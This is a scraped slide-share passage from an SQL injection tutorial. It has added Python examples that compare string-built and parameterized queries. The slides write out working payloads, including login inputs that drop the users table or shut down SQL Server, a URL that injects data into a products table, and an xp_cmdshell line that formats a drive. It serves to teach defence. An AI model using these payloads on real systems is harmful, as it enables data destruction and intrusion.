ScyllaDB
 
Web and Graphics Designing Training in Rajpura
Web and Graphics Designing Training in RajpuraWeb and Graphics Designing Training in Rajpura

Sql Injection Attacks Siddhesh

  • 12. Can you guess what happens? Username: ' or 1=1; drop table users; --
  • 13. Table dropped! Username: ' or 1=1; drop table users; -- and Password: [Anything] Firstly, it would select the userName field for all rows in the users table. Secondly, it would delete the users table.
  • 14. SHUTDOWN WITH NOWAIT!! … causes SQL Server to shut down, immediately stopping the Windows service. Username: '; shutdown with nowait; -- select userName from users where userName=''; shutdown with nowait; --' and userPass=''
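As an added illustration (not part of Siddhesh Bhobe's slides), here is the string-building login from login.asp beside a parameterized version, both run against a constructed two-row users table. SQLite stands in for SQL Server so the example runs offline: its `--` line comment and its OR precedence behave the same way, which is all the bypass relies on. The sample rows and password values are constructed.

```python
import sqlite3

# Constructed sample data: a two-row "users" table standing in for the
# SQL Server table behind the slides' login.asp.
def make_users_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (userName text, userPass text)")
    conn.executemany("insert into users values (?, ?)",
                     [("admin", "s3cret-admin"), ("john", "doe")])
    return conn

def build_login_query(user_name, password):
    """The slides' string-building: form input is pasted straight into SQL."""
    return ("select userName from users where userName='" + user_name
            + "' and userPass='" + password + "'")

def login_string_built(conn, user_name, password):
    """Vulnerable login (mirrors the ASP script). Returns the matched
    userName, or None when no row satisfies the WHERE clause."""
    row = conn.execute(build_login_query(user_name, password)).fetchone()
    return row[0] if row else None

def login_parameterized(conn, user_name, password):
    """Hardened login: the values travel separately from the SQL text, so a
    quote, '--' or 'or 1=1' in the input is compared as data, never parsed."""
    row = conn.execute(
        "select userName from users where userName=? and userPass=?",
        (user_name, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_users_db()
    for user, pw in [("john", "doe"),
                     ("john", "' or 1=1 --"),
                     ("' or users.userName like 'a%' --", "")]:
        print(repr(user), repr(pw),
              "| string-built ->", login_string_built(db, user, pw),
              "| parameterized ->", login_parameterized(db, user, pw))
```

The parameterized form gives the same protection the slides later get from stored procedures, provided the procedure itself is called with parameters rather than built from a concatenated string.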
  • 15. Products.asp http://localhost/products.asp?productId=1 returns Got product Pink Hoola Hoop. But what about this? http://localhost/products.asp?productId=0;insert%20into%20products(prodName)%20values(left(@@version,50))
  • 16. Wham! Here's the query without the URL-encoded spaces: http://localhost/products.asp?productId=0;insert into products(prodName) values(left(@@version,50)) Runs an INSERT query on the products table, adding the first 50 characters of SQL Server's @@version variable as a new record in the products table.
  • 17. Effects. Privilege level: sa. Total control of SQL Server; an OS shell at the privilege of the MSSQLServer service using xp_cmdshell; the ability to read, write and mutilate all data.
  • 18. Effects. Privilege level: db_owner. Read/write all data in the affected database; drop tables; create new objects; take control of the database.
  • 19. Effects. Privilege level: normal user (no fixed server or database roles). Access only to objects to which permission is given: at best, only a few stored procedures; at worst, read/write access to all tables. This is the recommended privilege level.
  • 20. Testing for Vulnerability. Disable error handling so that errors are displayed. Input single quotes to see if the application fails. Failure indicates poor validation and corruption of the SQL.
  • 21. Preventing SQL Injection Attacks. Limit user access; escape quotes; remove culprit characters; limit the length of user input.
  • 22. Limit User Access. Do not use the "sa" account. Remove extended stored procedures (SPs) if you are not using them; a couple of the most damaging ones are xp_cmdshell and xp_grantlogin. Use SPs to abstract data access.
  • 23. Escape Quotes. Convert each single quote into two single quotes: <% function stripQuotes(strWords) stripQuotes = replace(strWords, "'", "''") end function %> This converts select count(*) from users where userName='john' and userPass='' or 1=1 --' ...to this: select count(*) from users where userName='john'' and userPass=''' or 1=1 --'
  • 24. Drop Culprit Characters. Drop character sequences like ; , -- , insert and xp_. For example, select prodName from products where id=1; xp_cmdshell 'format c: /q /yes '; drop database myDB; -- becomes select prodName from products where id=1 cmdshell ''format c: /q /yes '' database myDB
  • 25. Restrict Length of User Input. Limit the length in the form field. Use validating functions for numeric input. Use POST, not GET.
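An added example (not from the slides) that ties the prevention slides together on the products.asp case: a Python port of the slides' stripQuotes() is applied to a productId that is never quoted in the SQL, so the escaping has nothing to act on, and a validating function with a length limit is shown as the fix for numeric input. SQLite stands in for SQL Server; the products rows and the MAX_ID_LEN limit are constructed for the example.

```python
import re
import sqlite3

MAX_ID_LEN = 10  # assumed form-field length limit for productId

def make_products_db():
    """Constructed sample data standing in for the slides' products table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table products (id integer, prodName text)")
    conn.executemany("insert into products values (?, ?)",
                     [(1, "Pink Hoola Hoop"), (2, "Blue Frisbee")])
    return conn

def strip_quotes(words):
    """Python port of the slides' stripQuotes(): each ' becomes ''."""
    return words.replace("'", "''")

def product_names_quotes_escaped(conn, product_id):
    """Escaping only. productId sits unquoted in the SQL, so an input that
    contains no quote passes through unchanged and still rewrites the
    WHERE clause."""
    query = "select prodName from products where id=" + strip_quotes(product_id)
    return [row[0] for row in conn.execute(query)]

def parse_product_id(raw, max_len=MAX_ID_LEN):
    """Validating function for numeric input: enforce the length limit and
    accept digits only, then hand the database a real integer."""
    if len(raw) > max_len or not re.fullmatch(r"[0-9]+", raw):
        raise ValueError("productId must be an unsigned integer")
    return int(raw)

def product_names_validated(conn, product_id):
    """Validation plus a placeholder: the id reaches SQL as a number, not text."""
    pid = parse_product_id(product_id)
    return [row[0] for row in
            conn.execute("select prodName from products where id=?", (pid,))]

if __name__ == "__main__":
    db = make_products_db()
    for raw in ["1", "0 or 1=1"]:
        print(repr(raw), "escaped-only ->", product_names_quotes_escaped(db, raw))
        try:
            print(repr(raw), "validated    ->", product_names_validated(db, raw))
        except ValueError as err:
            print(repr(raw), "validated    -> rejected:", err)
```

The length limit alone would not have stopped the short input used here; it is the digits-only check that rejects it, which is why the slides list length restriction and validating functions as separate measures.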
  • 26. Thanks! Original Article: http://www.webmasterbase.com/article.php?aid=794&pid=0 Also on Reismagos…